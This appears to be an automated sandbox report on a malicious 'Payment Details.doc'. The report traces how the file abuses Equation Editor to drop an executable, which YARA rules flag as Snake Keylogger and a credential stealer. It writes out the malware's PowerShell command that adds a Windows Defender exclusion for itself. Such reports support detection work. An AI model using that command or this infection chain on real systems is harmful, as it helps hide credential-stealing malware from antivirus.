                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009400409_2_00940040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942E789_2_00942E78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009457A89_2_009457A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00940ED89_2_00940ED8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009450C89_2_009450C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942AF99_2_00942AF9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009449E99_2_009449E9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942B009_2_00942B00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009443089_2_00944308
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009421309_2_00942130
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009421219_2_00942121
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00943C289_2_00943C28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0094354B9_2_0094354B
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942E689_2_00942E68
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe 516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe 516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                Source: Payment Details.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: HgCppsoKmxQq[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ncfplgpeter20306.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.SetAccessControl
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.AddAccessRule
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.SetAccessControl
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.cs Security API names: _0020.AddAccessRule
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Uel8r1lQF2PkteGZrv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@11/14@26/9
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$yment Details.doc
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Mutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA247.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................g .........................s....................l.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................s .........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................. .........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................. .........................s............................(...............Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: Payment Details.doc ReversingLabs: Detection: 44%
                Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Process created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Process created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: riched20.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: credssp.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Payment Details.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Payment Details.doc
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                Data Obfuscation

                Source: HgCppsoKmxQq[1].exe.2.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: ncfplgpeter20306.exe.2.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.cs .Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.216ee4c.5.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.220000.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.21b6cb8.4.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.2165834.2.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs .Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0029C361 pushad ; ret 2_2_0029C39D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00298F60 push eax; retf 2_2_00298F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00295A7B pushad ; iretd 2_2_00295AF5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002A4BBE push eax; ret 2_2_002A4BBF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002901F4 push eax; retf 2_2_002901F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0028F6C9 push ds; retf 2_2_0028F6CC
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002A4BCE push eax; ret 2_2_002A4BCF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0029A5DD push esp; iretd 2_2_0029A5DE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0029C2DC pushad ; retn 0029h 2_2_0029C2DD
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 5_2_001762A4 push esp; iretd 5_2_001762A9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 9_2_001C214D push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 9_2_001C217D push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 9_2_001C21AD push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 9_2_001C21FD push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 9_2_001CD410 push edi; retf 001Ch 9_2_001CD411
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Code function: 9_2_00719590 pushfd ; retn 006Fh 9_2_00719591
                Source: HgCppsoKmxQq[1].exe.2.dr Static PE information: section name: .text entropy: 7.882388794743662
                Source: ncfplgpeter20306.exe.2.dr Static PE information: section name: .text entropy: 7.882388794743662
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Rsjwms4Wh8At7jltVf.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, hnb1mywmKd17dlbrAS.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, LVNaJWsMIVA7LTLASE.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, D33N8oUtGVx7cDxPuT.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, zQyvpDqyxKTxd6tm0NN.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, ksWtZCxKsl0TxRCTo8.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, pLwTg0qqY9GrvEoZXIs.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, lDlgAUP9SyyXYURNLR.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, sC7nprRRvT8OJFZjOZ.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, fSdvMKZMagrtwMm7Ri.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, O9PymkJ3NMlC2399qj.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, pBjySHqM5QnwRNWaSBd.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, xGB0Wf6bc0bOdc8jTI.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, KdpVO0auC752URy1LH.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, AnptoFjC7pNu1LqbY6.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, qyT5B9fG4eENyHVdsw.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, ojeKecA3ycAgUvCgAn.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, kIOpWCowqWShKUKAee.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, KSQ07YHqchvMXla9N1.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Uel8r1lQF2PkteGZrv.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.216ee4c.5.raw.unpack, JK.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.220000.0.raw.unpack, JK.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.21b6cb8.4.raw.unpack, JK.cs High entropy of concatenated method names
                Source: 5.2.ncfplgpeter20306.exe.2165834.2.raw.unpack, JK.cs High entropy of concatenated method names
